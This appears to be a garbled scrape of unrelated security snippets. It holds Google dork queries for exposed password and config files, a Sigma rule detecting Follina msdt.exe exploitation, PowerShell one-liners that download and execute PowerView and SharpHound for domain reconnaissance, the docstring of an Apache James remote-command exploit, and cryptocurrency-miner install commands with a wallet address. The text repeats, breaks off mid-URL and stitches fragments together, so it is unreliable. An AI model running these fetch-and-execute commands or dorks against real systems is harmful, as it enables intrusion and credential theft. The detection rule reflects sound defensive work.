Original Source: https://securitytrails.com/blog/google-hacking-techniques
Reading time: 12 minutes
Some time ago we wrote an interesting post about the [OSINT](https://securitytrails.com/blog/what
Original Source: https://securitytrails.com/blog/google-hacking-techniques
Reading time: 12 minutes
Some time ago we wrote an interesting post about the [OSINT](https://securitytrails.com/blog/what
admin account info" filetype:log | |
!Host=*.* intext:enc_UserPassword=* ext:pcf | |
"# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd | |
"AutoCreate=TRUE password=*" | |
"http://*:*@www” domainname | |
"index of/" "ws_ftp.ini" "parent directory" | |
"liveice configuration file" ext:cfg -site:sourceforge.net | |
"parent directory" +proftpdpasswd | |
Duclassified" -site:duware.com "DUware All Rights reserved" | |
duclassmate" -site:duware.com |
title: Suspicious msdt.exe execution - Office Exploit | |
id: 97a80ed7-1f3f-4d05-9ef4-65760e634f6b | |
status: experimental | |
description: This rule will monitor suspicious arguments passed to the msdt.exe process. These arguments are an indicator of recent Office/Msdt exploitation. | |
references: | |
- https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e | |
- https://twitter.com/MalwareJake/status/1531019243411623939 | |
author: 'Matthew Brennan' | |
tags: | |
- attack.execution |
# Domain Recon | |
## ShareFinder - Look for shares on network and check access under current user context & Log to file | |
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt" | |
## Import PowerView Module | |
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')" | |
## Invoke-BloodHound for domain recon | |
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound" |
#!/usr/bin/python | |
# -*- coding: utf-8 -*- | |
# | |
# Copyright 2015, Francesco "dfirfpi" Picasso <[email protected]> | |
# | |
# Licensed under the Apache License, Version 2.0 (the "License"); | |
# you may not use this file except in compliance with the License. | |
# You may obtain a copy of the License at | |
# | |
# http://www.apache.org/licenses/LICENSE-2.0 |
#!/usr/bin/python | |
# -*- coding: utf-8 -*- | |
# | |
# Copyright 2017, Francesco "dfirfpi" Picasso <[email protected]> | |
# | |
# Licensed under the Apache License, Version 2.0 (the "License"); | |
# you may not use this file except in compliance with the License. | |
# You may obtain a copy of the License at | |
# | |
# http://www.apache.org/licenses/LICENSE-2.0 |
Pre-reqs:
"""An exploit for Apache James 2.3.2 that executes remote commands. | |
This script creates a new user and enqueues a payload to be executed the next | |
time a user logs in to the machine. The vulnerability is documented in | |
CVE-2015-7611. | |
For more details, see http://www.securityfocus.com/bid/76933 and | |
https://www.exploit-db.com/exploits/35513/. | |
""" |
Run this command to install MG-CLI: | |
sudo apt-get update && wget https://minergate.com/download/deb-cli -O minergate-cli.deb && sudo dpkg -i minergate-cli.deb | |
to start miner (4 cores for BCN) use this command: | |
minergate-cli -user <[email protected]> -bcn 4 | |
Feel free to send some of your earnings to me: | |
BTC (Don't attempt to send other coins to this address!): 17f77AYHsQbdsB1Q6BbqPahJ8ZrjFLYH2j |